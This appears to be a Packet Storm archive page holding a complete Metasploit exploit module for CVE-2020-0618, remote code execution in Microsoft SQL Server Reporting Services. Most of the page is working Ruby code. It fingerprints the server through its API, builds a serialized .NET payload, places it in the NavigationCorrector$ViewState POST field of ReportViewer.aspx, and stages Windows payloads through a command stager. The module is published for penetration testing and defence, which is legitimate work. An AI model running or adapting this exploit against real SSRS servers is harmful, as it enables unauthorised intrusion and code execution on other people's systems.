what you don't know can hurt you

SQL Server Reporting Services (SSRS) ViewState Deserialization

SQL Server Reporting Services (SSRS) ViewState Deserialization
Posted Mar 12, 2020
Authored by Soroush Dalili, Spencer McIntyre | Site metasploit.com

A vulnerability exists within Microsoft's SQL Server Reporting Services which can allow an attacker to craft an HTTP POST request with a serialized object to achieve remote code execution. The vulnerability is due to the fact that the serialized blob is not signed by the server.

tags | exploit, remote, web, code execution
advisories | CVE-2020-0618
MD5 | 0c8baebbb6c756de8b19d1b75adb66b5

SQL Server Reporting Services (SSRS) ViewState Deserialization

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'SQL Server Reporting Services (SSRS) ViewState Deserialization',
'Description' => %q{
A vulnerability exists within Microsoft's SQL Server Reporting Services
which can allow an attacker to craft an HTTP POST request with a
serialized object to achieve remote code execution. The vulnerability is
due to the fact that the serialized blob is not signed by the server.
},
'Author' => [
'Soroush Dalili', # discovery and original PoC
'Spencer McIntyre' # metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2020-0618'],
['URL', 'https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/'],
],
'Platform' => 'win',
'Targets' =>
[
[ 'Windows (x86)', { 'Arch' => ARCH_X86, 'Type' => :windows_dropper } ],
[ 'Windows (x64)', { 'Arch' => ARCH_X64, 'Type' => :windows_dropper } ],
[ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ]
],
'DefaultTarget' => 1,
'DisclosureDate' => '2020-02-11',
'Notes' =>
{
'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
'Reliability' => [ REPEATABLE_SESSION, ],
},
'Privileged' => true,
))

register_options([
OptString.new('TARGETURI', [ true, 'The base path to the web application', '/Reports' ]),
OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKSTATION' ]),
OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])
])
register_advanced_options([
OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),
])
end

def send_api_request(*parts)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'api', 'v1.0', *parts),
'headers' => {
'Accept' => 'application/json',
},
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
if res&.code == 200 && res.headers['Content-Type'].strip.start_with?('application/json;')
return res.get_json_document
end
end

def check
json_response = send_api_request('ReportServerInfo', 'Model.SiteName')
return CheckCode::Unknown unless json_response && json_response['value'] == 'SQL Server Reporting Services'
CheckCode::Detected
end

def exploit
fail_with(Failure::NotFound, 'Failed to detect the application') unless check == CheckCode::Detected

json_response = send_api_request('ReportServerInfo', 'Model.GetVirtualDirectory')
fail_with(Failure::UnexpectedReply, 'Failed to detect the report server virtual directory') if json_response.nil?
directory = json_response['value']
vprint_status("Detected the report server virtual directory as: #{directory}")

state = {vd: directory}
if target['Type'] == :windows_command
execute_command(payload.encoded, state: state)
else
cmd_target = targets.select { |target| target['Type'] == :windows_command }.first
execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})
end
end

def execute_command(cmd, opts)
state = opts[:state]
viewstate = Rex::Text.encode_base64(::Msf::Util::DotNetDeserialization.generate(cmd))

res = send_request_cgi({
'uri' => normalize_uri(state[:vd], 'Pages', 'ReportViewer.aspx'),
'method' => 'POST',
'vars_post' => {
'NavigationCorrector$PageState' => 'NeedsCorrection',
'NavigationCorrector$ViewState' => viewstate,
'__VIEWSTATE' => ''
},
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})

unless res&.code == 200
print_error('Non-200 HTTP response received while trying to execute the command')
end

end
end
Login or Register to add favorites

File Archive:

June 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    10 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close